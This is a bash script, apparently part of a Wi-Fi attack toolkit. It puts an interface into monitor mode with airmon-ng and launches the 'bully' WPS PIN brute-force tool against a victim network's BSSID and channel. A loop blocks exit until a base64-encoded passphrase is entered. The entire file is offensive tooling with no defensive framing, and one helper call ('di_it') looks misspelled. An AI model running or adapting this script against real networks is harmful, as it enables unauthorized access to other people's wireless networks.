#!/bin/bash

#source and call depends()
source userspace
source airmon
depends


#nm_chcek was here

bully()
{
    xterm -hold -bg black -fg blue -T "Bully" -geometry 90x20 -e bully -b $VICTIM_BSSID -c $CHAN -B $MON &>/dev/null &
    keepalive
}

trap killAll INT HUP;
keepalive()
{
    read -p "$WARN Press ctrl^c when you are ready to go down!" ALLINTHEFAMILY # Protect this script from going down hastily
    [[ $ALLINTHEFAMILY != 'SGFjayBUaGUgUGxhbmV0IQ==' ]] && clear; keepalive
}

killAll()
{
    airmon-ng stop $MON
    echo "${BLD_TEA}$(cat ${DIR_LOGO}die.logo)${TXT_RST}"
    sleep 2
    exit 0
}
depends #sourced from userspace
di_it #sourced from airmon
do_it_check #sourced from airmon
bully